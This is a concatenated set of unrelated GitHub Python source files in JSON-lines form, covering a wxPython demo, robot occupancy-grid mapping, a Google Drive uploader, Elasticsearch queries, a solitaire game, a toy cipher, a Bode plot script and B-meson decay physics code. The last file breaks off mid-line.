parent, id):\r\n wx.Frame.__init__(self, parent, id, \"Mini size\", (300,400))\r\n self.SetIcon(wx.Icon(\"secure.ico\", wx.BITMAP_TYPE_ICO))\r\n \r\n panel = wx.Panel(self)\r\n statictext = wx.StaticText(panel, -1, \"Hello world\", (50,30))\r\n \r\n self.taskbaricon = TaskBarIcon(self)\r\n \r\n self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)\r\n \r\n def OnClose(self, event):\r\n self.taskbaricon.Destroy()\r\n self.Destroy()\r\n \r\n def OnIconfiy(self, event):\r\n self.Hide()\r\n event.Skip()\r\n \r\nif __name__ == \"__main__\":\r\n app = wx.PySimpleApp()\r\n frame = MyFrame(None, -1)\r\n frame.Show()\r\n app.MainLoop()","repo_name":"bspeng922/pyutils","sub_path":"pydemo/src/wxdemo/taskicon.py","file_name":"taskicon.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"562784276","text":"import numpy as np\nimport math\nfrom scipy.ndimage import gaussian_filter\nfrom math import cos, sin, sqrt\nfrom utils.geometrics_util import bresenham_line\nfrom supervisor.mapping.Mapping import Mapping\nimport time\n\n\nclass OccupancyGridMapping2d(Mapping):\n def __init__(self, slam, slam_cfg, supervisor_interface, path_planner=None, callback=None):\n \"\"\"\n Initialize the OccupancyGridMapping2d object\n :param slam: The underlying slam algorithm object.\n :param slam_cfg: The slam configuration.\n :param path_planner: An object of PathPlanning\n :param viewer_resolution: viewer_resolution, pixels per meters\n :param callback: callback function\n \"\"\"\n self.supervisor = supervisor_interface\n self.slam = slam\n self.path_planner = path_planner\n self.width = slam_cfg['mapping']['gridmap']['width'] # width of the map in meters\n self.height = slam_cfg['mapping']['gridmap']['height'] # height of the map in meters\n self.resolution = slam_cfg['mapping']['gridmap'][\n 'resolution'] # resolution of the map, i.e. number of grids per meter\n self.W = int(self.width * self.resolution) # width of the map in pixels\n self.H = int(self.height * self.resolution) # height of the map in pixels\n self.offset = (self.width / 2, self.height / 2)\n self.max_range = supervisor_interface.proximity_sensor_max_range()\n\n self.prob_unknown = 0.5 # prior\n self.prob_occ = 0.8 # probability perceptual a grid is occupied\n self.prob_free = 0.2 # probability perceptual a grid is free\n\n self.callback = callback\n self.reset() # initialize the algorithm\n\n def reset(self):\n \"\"\"\n reset the map\n \"\"\"\n self.update_enabled = False\n self.map = np.full((self.H, self.W), self.prob_unknown, dtype=np.float32)\n self.L = self.__prob2log(\n np.full_like(self.map, self.prob_unknown, dtype=np.float32)) # log recursive term of the map\n self.L0 = self.__prob2log(np.full_like(self.map, self.prob_unknown, dtype=np.float32)) # log prior term of the map\n\n self.path = list() # a path calculated by path planner\n self.update_counter = 0\n\n def update(self, z):\n \"\"\"\n Update the occupancy gridmap recursively\n Update the path planning\n :param z: Measurement, represented as tuple of measured distance and measured angle\n \"\"\"\n if not self.update_enabled:\n return\n\n start_time = time.time()\n\n observed_pixs = [] # a list of grid positions and its occupancy probabilities\n lines = self.__calc_lines(z)\n for x0, y0, x1, y1 in lines:\n x0, y0 = self.__to_gridmap_position(x0, y0) # from position in meters to position in pixels\n x1, y1 = self.__to_gridmap_position(x1, y1) # from position in meters to position in pixels\n points = bresenham_line(x0, y0, x1, y1) # a list of points on the line\n occ_probs = self.__inverse_sensor_model(points) # calculate the occupancy probabilities on this line\n observed_pixs += occ_probs\n\n inverse_sensor = np.copy(self.L0) # initialize the inverse-sensor-model term by prior\n\n for xi, yi, prob_occ in observed_pixs:\n if xi < self.W and xi >= 0 and yi < self.H and yi >= 0:\n inverse_sensor[yi, xi] = math.log((prob_occ / (1 - prob_occ)))\n self.L = self.L + inverse_sensor - self.L0 # update the recursive term\n self.L = np.clip(self.L, -5, 5)\n self.update_counter += 1\n\n mapping_time = time.time() - start_time\n start_time = time.time()\n self.__update_path_planning() # update path planning\n path_planning_time = time.time() - start_time\n\n if self.callback is not None:\n self.callback(str(self), mapping_time)\n self.callback(\"A Star planning\", path_planning_time)\n\n def get_path(self):\n \"\"\"\n Get the path from the path planner.\n :return: A list of points on the path. A single item is (x, y) in meters.\n \"\"\"\n if len(self.path) > 1:\n world_path = [self.__to_world_position(xi, yi) for xi, yi in self.path]\n else:\n world_path = list()\n return world_path\n\n def get_map(self):\n \"\"\"\n :return: a 2D numpy.array of the occupied gridmap.\n A single value represents the probability of the occupancy\n \"\"\"\n self.map = self.__log2prob(self.L)\n return self.map\n\n def map_shape(self):\n \"\"\"\n Get map shape\n :return: a tuple of shape, i.e. (rows, columns)\n \"\"\"\n return self.map.shape\n\n def __update_path_planning(self):\n occ_threshold = 0.1\n try:\n if self.path_planner is not None and self.update_counter % 5 == 0 and self.update_counter > 5:\n goal = self.supervisor.goal() # get the goal\n start = self.slam.get_estimated_pose().sunpack() # get the estimated pose from slam\n gx, gy = self.__to_gridmap_position(goal[0], goal[1])\n sx, sy = self.__to_gridmap_position(start[0], start[1])\n self.map[sy, sx] = 0\n\n if self.map[gy, gx] < occ_threshold:\n bool_map = self.blur(self.map)\n # bool_map = np.copy(self.map) # calculate a boolean map\n bool_map[bool_map >= occ_threshold] = True\n bool_map[bool_map < occ_threshold] = False\n bool_map = bool_map.astype(np.bool)\n bool_map[sy, sx] = False\n bool_map[gy, gx] = False\n self.path = self.path_planner.execute(sx, sy, gx, gy, bool_map, type='euclidean')\n else:\n self.path = list()\n except IndexError:\n pass\n\n def __inverse_sensor_model(self, points):\n \"\"\"\n Inverse sensor model. Calculate the probability the occupied points on a segment\n :param points: points on a segment in pixels\n :return: A list of occupancy probabilities of the grids on the segment.\n A single item is (x, y, prob) where (x, y) is the prosition of a grid, and prob is the occupancy probability.\n \"\"\"\n a = 0.3 * self.resolution # the thick of the obstacles\n x0, y0 = points[0] # start point position\n xn, yn = points[-1] # end point position, the position of a obstacle\n z_t = sqrt((xn - x0) ** 2 + (yn - y0) ** 2) # the length of the segment, z_t\n z_max = self.max_range * self.resolution\n probs = [] # occupancy probabilities of the grids on the segment.\n for xi, yi in points:\n r = sqrt((xi - x0) ** 2 + (yi - y0) ** 2) # a distance of a cell from the robot\n prob = self.prob_unknown\n if r > min(z_max, z_t + a * 0.5): # return a prior\n prob = self.prob_unknown\n if z_t < z_max and abs(r - z_t) < a * 0.5: # return a occ probability\n prob = self.prob_occ\n if r < z_t:\n prob = self.prob_free\n probs.append((int(xi), int(yi), prob))\n\n return probs\n\n def blur(self, image):\n \"\"\"\n Blur the map\n :return:\n \"\"\"\n return gaussian_filter(image, sigma=2)\n\n def __calc_lines(self, z):\n \"\"\"\n Calculate the start points end end points of segments.\n :param z: Measurement, represented as tuple of measured distance and measured angle\n :return:\n A list of segments. A single line is represented by (x0, y0, x, y1)\n where (x0, y0) is the position of the start point and (x, y1) is the position of the end point.\n \"\"\"\n pose = self.slam.get_estimated_pose().sunpack()\n lines = []\n for measurement in z:\n lmx, lmy = self.calc_landmark_position(pose, measurement)\n lines.append((pose[0], pose[1], lmx, lmy))\n return lines\n\n def __to_gridmap_position(self, x, y):\n \"\"\"\n Calculate the position of a pixel in the grid map\n :param x: x in meters\n :param y: y in meters\n :return:\n pix_x in pixels\n pix_y in pixels\n \"\"\"\n pix_x = round((x + self.offset[0]) * self.resolution)\n pix_y = round((y + self.offset[1]) * self.resolution)\n return int(pix_x), int(pix_y)\n\n def __to_world_position(self, x, y):\n \"\"\"\n Calculate the position of a pixel in the grid map\n :param x: x in pixels\n :param y: y in pixels\n :return:\n pix_x in meters\n pix_y in meters\n \"\"\"\n meter_x = x / self.resolution - self.offset[0]\n meter_y = y / self.resolution - self.offset[1]\n return meter_x, meter_y\n\n def __prob2log(self, p):\n \"\"\"\n Convert probability to log-odds ratio\n :param p: probability that a grid is occupied\n :return: log likelihood\n \"\"\"\n return np.log(p / (1 - p))\n\n def __log2prob(self, lx):\n \"\"\"\n Convert log-odds ratio to probability\n :param lx: the log-odds ratio\n :return: probability that a grid is occupied\n \"\"\"\n return 1 - 1 / (1 + np.exp(lx))\n\n @staticmethod\n def calc_landmark_position(x, z):\n \"\"\"\n Returns the measured landmark position\n :param x: The robots pose (or combined state vector, only matters that first three elements are robot pose)\n :param z: Measurement, represented as tuple of measured distance and measured angle\n :return: Measured landmark position\n \"\"\"\n lm = [0, 0]\n lm[0] = x[0] + z[0] * cos(z[1] + x[2])\n lm[1] = x[1] + z[0] * sin(z[1] + x[2])\n return lm\n\n def __str__(self):\n return \"OccupancyGridMapping2d\"","repo_name":"yixinglin/sobot-rimulator","sub_path":"supervisor/mapping/OccupancyGridMapping2d.py","file_name":"OccupancyGridMapping2d.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"17885367266","text":"import os\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom dotenv import load_dotenv\nimport json\nload_dotenv()\n\n\nclass GoogleDriveUploader:\n def __init__(self):\n self.SCOPES = ['https://www.googleapis.com/auth/drive']\n self.SERVICE_ACCOUNT_JSON = os.getenv('SERVICE_ACCOUNT')\n self.PARENT_FOLDER_ID = os.getenv('ID')\n\n def authenticate(self):\n creds = service_account.Credentials.from_service_account_info(\n info=json.loads(self.SERVICE_ACCOUNT_JSON), scopes=self.SCOPES)\n return creds\n\n def upload_photo(self, file_name, file_path):\n creds = self.authenticate()\n service = build('drive', 'v3', credentials=creds)\n\n file_metadata = {\n 'name': file_name,\n 'parents': [self.PARENT_FOLDER_ID]\n }\n\n file = service.files().create(\n body=file_metadata,\n media_body=file_path\n ).execute()\n\n # Retrieve the web view link of the uploaded file\n web_view_link = file.get('webViewLink')\n\n return web_view_link\n","repo_name":"cemund/auto-montage","sub_path":"google_drive_upload.py","file_name":"google_drive_upload.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5446237077","text":"import asyncio\nimport unittest\nfrom utilities.find_queue import find_queue\n\n\nclass TestDiceUtils(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.channel_id = -2\n cls.control = [\n ('TestPlayer2', '5'),\n ('TestPlayer1', '3')\n ]\n\n def test_find_queue(self):\n case = asyncio.run(find_queue(self.channel_id))\n self.assertEqual(self.control, case)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"anastasiosmx/Dungeons-and-Discord","sub_path":"tests/tests_on_utilities/test_find_queue.py","file_name":"test_find_queue.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18736792615","text":"from tkinter import ttk\nfrom tkinter import *\nfrom card import Card\nfrom card import Deck\nfrom PIL import Image, ImageTk\nfrom draggable import Draggable\nroot = Tk()\ndnd = Draggable()\n\ndp = Deck(\"Deck\")\nfds = [Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\")]\ntableau = [Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\"), Deck(\"Pile\")]\ncardstoadd = 1\nfor pile in tableau:\n pile.add([dp.deal() for card in range(cardstoadd)])\n cardstoadd += 1\n for card in pile.cards:\n card.visible = False\n pile.cards[0].visible = True\ndp.cards[0].visible = False\nfor card in dp.cards:\n if card.visible:\n print(\"Mistake\")\n\ndef drag(card, fd):\n if len(fd.cards) != 0:\n top = fd.cards[0]\n if top.suit == card.suit and card.value == top.value+1:\n fd.add([card])\n return True\n else:\n if card.value == 1:\n fd.add([card])\n return True\n return False\ncanvas = Canvas(root, height=900, width=1200)\ncanvas.grid()\nempty = PhotoImage(file=\"DeckOfCards\\emptypile.png\")\nempty = empty.subsample(4, 4)\nfor x in range(7):\n canvas.create_image(150 + x * 150, 300 + (len(tableau[x].cards) - x) * 50, image=empty)\n for y in reversed(range(x+1)):\n\n # if tableau[x].cards[y].visible:\n tableau[x].cards[y].image()\n canvas.create_image(150+x*150, 300+(len(tableau[x].cards)-y)*50, image=tableau[x].cards[y].image)\n # root.after(1000)\ncanvas.create_image(150, 100, image=empty)\nfor card in reversed(dp.cards):\n card.image()\n canvas.create_image(150, 100, image = card.image)\nfor x in range(5):\n canvas.create_image(300+x*150, 100, image=empty)\n# cardholder = Label(canvas, image=tableau[0].cards[0].image)\n# cardholder.pack()\n# cardholder.place(x=150, y=300)\n# dnd.add_draggable(cardholder)\ncanvas.move(tableau[0].cards[0].image, 0, 200)\nroot.mainloop()\n","repo_name":"CantChooseThis/Solitaire","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37227898344","text":"from elasticsearch import Elasticsearch \r\n\r\n\r\nes=Elasticsearch([{'host':'localhost','port':9200}])\r\n\r\nq4 = {'query':{'match':{'first_name':'abhay'}}}\r\n\r\nq5 = {'query':{'bool':{'must':[{'match':{'first_name':'abhay'}}]}}}\r\n\r\nq6 = {\r\n 'query':{\r\n 'bool':{\r\n 'must':{\r\n 'match':{\r\n 'first_name':'abhay'\r\n }\r\n },\r\n \"filter\":{\r\n \"range\":{\r\n \"age\":{\r\n \"gt\":25\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\nq7 = {\r\n 'query':{\r\n 'match':{\r\n \"about\":\"play cricket\"\r\n }\r\n }\r\n }\r\n\r\nq8 = {\r\n 'query':{\r\n 'match_phrase':{\r\n \"about\":\"play cricket\"\r\n }\r\n }\r\n }\r\nq9 = {\r\n \"aggs\": {\r\n \"all_interests\": {\r\n \"terms\": { \"field\": \"interests.keyword\" }\r\n }\r\n }\r\n}\r\n\r\nq10 = {\r\n \"query\":{\r\n \"multi_match\" : {\r\n \"query\": \"paprola\",\r\n \"fields\": [ \"city\", \"state\" ]\r\n }\r\n }\r\n}\r\nq11 = {\"query\":{\r\n \"query_string\":{\r\n \"query\":\"play\"\r\n }\r\n }\r\n}\r\n\r\nq12 = {\r\n \"query\":{\r\n \"term\":{\"zip\":\"176115\"}\r\n \t\t\t}\r\n\t}\r\n\r\n\r\ndef search_queries(query_dic,index):\r\n\toutput = es.search(index=index,body=query_dic)\r\n\tfor hit in output['hits']['hits']:\r\n\t\tresult = hit['_source']\r\n\tprint('result = ',result)\r\n\tprint('******************************************')\r\n\r\n\r\n\r\n\r\noutput1=es.get(index='company',id=3)\r\nprint('dic of employee with id 3',output1)\r\nprint('source_dict/actaul_doc',output1['_source'])\r\n# outut2=es.delete(index='company',id=2)\r\nprint('******************************************')\r\noutput4= es.search(index='company',body=q4)\r\nprint('doc with first name matching: ',output4['hits']['hits'])\r\nprint('******************************************')\r\noutput5= es.search(index='company',body=(q5))\r\nprint(\"boll_search: \",output5['hits']['hits'])\r\nprint('******************************************')\r\noutput6 = es.search(index='company',body=(q6))\r\nprint(\"search with filter: \",output6['hits']['hits'])\r\nprint('******************************************')\r\noutput7= es.search(index='company',body=(q7))\r\nprint(\"full text search: \")\r\nfor hit in output7['hits']['hits']:\r\n print(hit['_source']['about']) \r\n print(hit['_score'])\r\n print('**********************')\r\n\r\n\r\n\r\n\r\n\r\n\r\nsearch_queries(q8,'company')\r\nsearch_queries(q9,'company')\r\nsearch_queries(q10,'company')\r\nsearch_queries(q11,'company')\r\nsearch_queries(q12,'company')\r\n\r\n","repo_name":"prerna7982-code/demo-projects","sub_path":"elastic_search_queries.py","file_name":"elastic_search_queries.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12253169099","text":"def QuadTree(data, n):\r\n m = n // 2\r\n if n == 1:\r\n return data[0][0]\r\n countzero = 0\r\n\r\n for i in range(n):\r\n countzero += data[i].count('0')\r\n\r\n if countzero == n * n:\r\n return '0'\r\n elif countzero == 0:\r\n return '1'\r\n quad1 = list(map(lambda x: x[:m], data[:m]))\r\n quad2 = list(map(lambda x: x[m:], data[:m]))\r\n quad3 = list(map(lambda x: x[:m], data[m:]))\r\n quad4 = list(map(lambda x: x[m:], data[m:]))\r\n return '(' + QuadTree(quad1, m) + QuadTree(quad2, m) + QuadTree(quad3, m) + QuadTree(quad4, m) + ')'\r\n\r\n\r\nN = int(input())\r\n\r\ndata_input = [list(input()) for _ in range(N)]\r\n\r\nans = QuadTree(data_input, N)\r\n\r\nprint(ans)\r\n","repo_name":"cocosasa/Beakjoon-muscle","sub_path":"백준/Silver/1992. 쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35320519065","text":"class TablaHash:\n def __init__(self):\n self.tabla = {}\n\n def agregar_elemento(self, clave, valor):\n self.tabla[clave] = valor\n\n def obtener_elemento(self, clave):\n return self.tabla.get(clave)\n\n def obtener_tamanio(self):\n return len(self.tabla)\n\n def obtener_cadena(self):\n return str(self.tabla)\n\n\nclass Encriptador:\n def __init__(self):\n self.tabla_encriptacion = TablaHash()\n self.tabla_desencriptacion = TablaHash()\n self.generar_tablas_hash()\n\n def generar_tablas_hash(self):\n matriz_hash = [[0 for i in range(8)] for j in range(94)]\n for i in range(32, 126):\n for j in range(8):\n matriz_hash[i-32][j] = (i+j) % 94\n for i in range(94):\n cadena = \"\"\n for j in range(8):\n cadena += chr(matriz_hash[i][j] + 32)\n caracter = chr(i+32)\n self.tabla_encriptacion.agregar_elemento(caracter, cadena)\n self.tabla_desencriptacion.agregar_elemento(cadena, caracter)\n\n def encriptar(self, mensaje):\n mensaje_encriptado = \"\"\n for caracter in mensaje:\n cadena = self.tabla_encriptacion.obtener_elemento(caracter)\n if cadena is not None:\n mensaje_encriptado += cadena\n return mensaje_encriptado\n\n def desencriptar(self, mensaje_encriptado):\n mensaje = \"\"\n for i in range(0, len(mensaje_encriptado), 8):\n cadena = mensaje_encriptado[i:i+8]\n caracter = self.tabla_desencriptacion.obtener_elemento(cadena)\n if caracter is not None:\n mensaje += caracter\n return mensaje\n\n\n# Ejemplo de uso\nencriptador = Encriptador()\nmensaje_original = \"Hola, Rebelión!\"\nmensaje_encriptado = encriptador.encriptar(mensaje_original)\nmensaje_desencriptado = encriptador.desencriptar(mensaje_encriptado)\nprint(\"Mensaje original:\", mensaje_original)\nprint(\"Mensaje encriptado:\", mensaje_encriptado)\nprint(\"Mensaje desencriptado:\", mensaje_desencriptado)\n","repo_name":"oliviaclemente/-Parcial22_23_Olivia_Clemente","sub_path":"ej5/ej5.py","file_name":"ej5.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18929291706","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nf = open(\"Trinn1.txt\", \"r\")\r\nline1 = f.readline()\r\n\r\nfreq = []\r\ngain = [] \r\nphase = []\r\n\r\nline = f.readline().strip('\\n')\r\n\r\nwhile line !=\"\":\r\n data1, data2 = line.split()\r\n freq.append(round(float(data1), 4))\r\n gainRaw, phaseRaw = data2.split(\",\")\r\n gain.append(round(float(gainRaw.strip(\"(dB\")), 4))\r\n phase.append(round(float(phaseRaw.strip(\")°\")), 4))\r\n line = f.readline()\r\n\r\n#Finding the -3 dB value and finding the value nearest this value in the list.\r\nabsolute_difference_function = lambda list_value : abs(list_value - (max(gain)-3))\r\nclosest_value = min(gain, key=absolute_difference_function)\r\npeak_dB_LTSpice = max(gain)\r\nfreq_comment = str(freq[gain.index(closest_value)]) \r\nx_coord_LTSpice = freq[gain.index(closest_value)]\r\ny_coord_LTSpice = gain[gain.index(closest_value)]\r\n\r\n#dB plot\r\nplt.figure()\r\nplt.subplot(211)\r\nplt.semilogx(freq, gain)\r\n\r\n#Comment out these to remove the point, annotation and legend.\r\nplt.scatter(x_coord_LTSpice, y_coord_LTSpice, color = 'red')\r\nplt.annotate('-3dB at {}Hz'.format(freq_comment), (x_coord_LTSpice, y_coord_LTSpice))\r\nplt.legend(['Peak value {}dB'.format(peak_dB_LTSpice)], loc =\"lower left\") #Use this to change the location\r\n\r\nplt.ylabel('dB Mag.')\r\nplt.grid()\r\n\r\n#Phaseplot\r\nplt.subplot(212)\r\nplt.semilogx(freq, phase)\r\nplt.xlabel('Freq. (Hz)')\r\nplt.ylabel('Phase (deg.)')\r\nplt.grid()\r\nplt.show()\r\n","repo_name":"WilliamHaugerud/LTSpice-BodePlotGrapher","sub_path":"LTSpiceBodePlotter.py","file_name":"LTSpiceBodePlotter.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35969750375","text":"import datetime\nimport json\nimport subprocess\nfrom functools import reduce\n\nfrom models import VirtualMachine, Tag, FirewallRule, create_tables, tables_exist, ServerProcess\n\nBATCH_SIZE = 999\n\n\ndef populate_data(file_name):\n with open(file_name) as json_file:\n data = json.load(json_file)\n\n vms = data['vms']\n fw_rules = data['fw_rules']\n\n vm_tags = reduce(lambda tags, v: tags + v['tags'], vms, [])\n fw_tags = reduce(lambda tags, fwr: tags + [fwr['source_tag'], fwr['dest_tag']], fw_rules, [])\n tag_objs = [Tag(tag=t) for t in list(set(vm_tags + fw_tags))]\n Tag.bulk_create(tag_objs, batch_size=BATCH_SIZE)\n\n for vm in vms:\n vm_obj = VirtualMachine.create(vm_id=vm['vm_id'], name=vm['name'])\n vm_obj.tags.add(Tag.select().where(Tag.tag.in_(vm['tags'])))\n\n fw_objs = [FirewallRule(fw_id=fw['fw_id'],\n source_tag=Tag.get(tag=fw['source_tag']),\n dest_tag=Tag.get(tag=fw['dest_tag']))\n for fw in fw_rules]\n FirewallRule.bulk_create(fw_objs, batch_size=BATCH_SIZE)\n\n\ndef setup():\n if not tables_exist():\n create_tables()\n populate_data('init_data.json')\n\n\ndef runserver():\n ServerProcess.create(start_time=datetime.datetime.now())\n bash_command = \"\"\"gunicorn app\"\"\"\n process = subprocess.Popen(bash_command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n\ndef main():\n setup()\n runserver()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ngoodman90/attack_surface","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30268862963","text":"r\"\"\"Functions for exclusive $B\\to V\\ell\\nu$ decays.\"\"\"\n\nfrom math import sqrt, pi, cos, sin\nimport flavio\nfrom flavio.physics.bdecays.common import lambda_K, meson_quark, meson_ff\nfrom flavio.physics.bdecays.wilsoncoefficients import wctot_dict\nfrom flavio.physics import ckm\nfrom flavio.classes import AuxiliaryQuantity\nfrom flavio.config import config\nfrom flavio.physics.running import running\nfrom flavio.physics.bdecays import angular\nfrom flavio.physics.bdecays.wilsoncoefficients import get_wceff_fccc\nfrom flavio.classes import Observable, Prediction\n\ndef get_ff(q2, par, B, V):\n \"\"\"Return the form factors\"\"\"\n ff_name = meson_ff[(B,V)] + ' form factor'\n return AuxiliaryQuantity[ff_name].prediction(par_dict=par, wc_obj=None, q2=q2)\n\ndef prefactor(q2, par, B, V, lep):\n \"\"\"Return the prefactor including constants and CKM elements\"\"\"\n GF = par['GF']\n scale = config['renormalization scale']['bvll']\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n tauB = par['tau_'+B]\n laB = lambda_K(mB**2, mV**2, q2)\n laGa = lambda_K(q2, ml**2, 0.)\n qi_qj = meson_quark[(B, V)]\n if qi_qj == 'bu':\n Vij = ckm.get_ckm(par)[0,2] # V_{ub} for b->u transitions\n if qi_qj == 'bc':\n Vij = ckm.get_ckm(par)[1,2] # V_{cb} for b->c transitions\n if q2 <= ml**2:\n return 0\n return 4*GF/sqrt(2)*Vij\n\ndef get_angularcoeff(q2, wc_obj, par, B, V, lep):\n Jlist = [_get_angularcoeff(q2, wc_obj, par, B, V, lep, nu)\n for nu in ['e', 'mu', 'tau']]\n J = {}\n J['1s'] = sum([JJ['1s'] for JJ in Jlist])\n J['1c'] = sum([JJ['1c'] for JJ in Jlist])\n J['2s'] = sum([JJ['2s'] for JJ in Jlist])\n J['2c'] = sum([JJ['2c'] for JJ in Jlist])\n J['6s'] = sum([JJ['6s'] for JJ in Jlist])\n J['6c'] = sum([JJ['6c'] for JJ in Jlist])\n J[3] = sum([JJ[3] for JJ in Jlist])\n J[4] = sum([JJ[4] for JJ in Jlist])\n J[5] = sum([JJ[5] for JJ in Jlist])\n J[7] = sum([JJ[7] for JJ in Jlist])\n J[8] = sum([JJ[8] for JJ in Jlist])\n J[9] = sum([JJ[9] for JJ in Jlist])\n return J\n\n\n\ndef _get_angularcoeff(q2, wc_obj, par, B, V, lep, nu):\n scale = config['renormalization scale']['bvll']\n mb = running.get_mb(par, scale)\n wc = get_wceff_fccc(wc_obj, par, meson_quark[(B,V)], lep, nu, mb, scale, nf=5)\n if lep != nu and all(C == 0 for C in wc.values()):\n # if all WCs vanish, so does the AC!\n return {k: 0 for k in\n ['1s', '1c', '2s', '2c', '6s', '6c', 3, 4, 5, 7, 8, 9]}\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n qi_qj = meson_quark[(B, V)]\n if qi_qj == 'bu':\n mlight = 0. # neglecting the up quark mass\n if qi_qj == 'bc':\n mlight = running.get_mc(par, scale) # this is needed for scalar contributions\n N = prefactor(q2, par, B, V, lep)\n ff = get_ff(q2, par, B, V)\n h = angular.helicity_amps_v(q2, mB, mV, mb, mlight, ml, 0, ff, wc, N)\n J = angular.angularcoeffs_general_v(h, q2, mB, mV, mb, mlight, ml, 0)\n return J\n\ndef dGdq2(J):\n r\"\"\"$q^2$-differential branching ratio in terms of angular coefficients.\"\"\"\n return 3/4. * (2 * J['1s'] + J['1c']) - 1/4. * (2 * J['2s'] + J['2c'])\n\ndef dGdq2_L(J):\n r\"\"\"$q^2$-differential branching ratio to longitudinally polarized\n vector meson in terms of angular coefficients.\"\"\"\n return 3/4. * J['1c'] - 1/4. * J['2c']\n\ndef dGdq2_T(J):\n r\"\"\"$q^2$-differential branching ratio to transversely polarized\n vector meson in terms of angular coefficients.\"\"\"\n return 3/2. * J['1s'] - 1/2. * J['2s']\n\n# For the angle-differential and binned distributions, the main idea is this:\n# while the q2-integration has to be done numerically, the angle integration is\n# trivial to do analytically as the angular dependence is given in terms of\n# trigonometric functions. So the differential distributions are given as\n# dictionaries with (q2-dependent) coefficients of these angular functions.\n# Integration (i.e. binning) in angles then merely amounts to replacing the\n# angular functions by their respective integrals.\n\ndef dG_dq2_dcosthl(J):\n r\"\"\"$\\cos\\theta_\\ell$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\theta_\\ell$.\"\"\"\n return {'1': 3/8. * (J['1c'] + 2*J['1s']),\n 'c': 3/8. * (J['6c'] + 2*J['6s']),\n 'c2': 3/8. * (J['2c'] + 2*J['2s']) }\n\ndef dG_dq2_dcosthV(J):\n r\"\"\"$\\cos\\theta_V$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\theta_V$.\"\"\"\n return {'c^2': -3/8. * (-3*J['1c'] + J['2c']),\n 's^2': -3/8. * (-3*J['1s'] + J['2s']) }\n\ndef dG_dq2_dphi(J):\n r\"\"\"$\\phi$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\phi$.\"\"\"\n return {'1': 1/(8*pi) * (3*J['1c'] + 6*J['1s'] - J['2c'] - 2*J['2s']),\n 'c2': 1/(2*pi) * J[3],\n 's2': 1/(2*pi) * J[9] }\n\ndef _cos_angle_diff(costh):\n r\"\"\"Trigonometric functions for differential distributions in terms of\n $\\cos\\theta_{\\ell,V}$\"\"\"\n return {'1': 1, 'c': costh, 'c2': 2*costh**2-1, 'c^2': costh**2,\n 's^2': 1 - costh**2, 's2': 2*costh*sqrt(1-costh**2)}\n\ndef _cos_angle_int(costh):\n r\"\"\"Integrated trigonometric functions for binned distributions in terms of\n $\\cos\\theta_{\\ell,V}$\"\"\"\n return {'1': costh, 'c': costh**2/2., 'c2': 2*costh**3/3.-costh,\n 'c^2': costh**3/3., 's^2': costh - costh**3/3.,\n 's2': -2/3.*(1-costh**2)**(3/2.)}\n\ndef _angle_diff(phi):\n r\"\"\"Trigonometric functions for differential distributions in terms of\n $\\phi$\"\"\"\n return {'1': 1, 'c2': cos(2*phi), 's2': sin(2*phi)}\n\ndef _angle_int(phi):\n r\"\"\"Integrated trigonometric functions for binned distributions in terms of\n $\\phi$\"\"\"\n return {'1': phi, 'c2': sin(2*phi)/2., 's2': -cos(2*phi)/2.}\n\ndef obs_q2int(fct, wc_obj, par, B, V, lep):\n \"\"\"q2-integrated observable\"\"\"\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n def integrand(q2):\n return fct(q2)\n return flavio.math.integrate.nintegrate(integrand, q2min, q2max)\n\ndef kinem_allowed(q2, par, B, V, lep):\n \"\"\"True if q2 is in the kinematically allowed region\"\"\"\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n if q2 < ml**2 or q2 > (mB-mV)**2:\n return False\n else:\n return True\n\ndef FL_diff(q2, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n J = get_angularcoeff(q2, wc_obj, par, B, V, 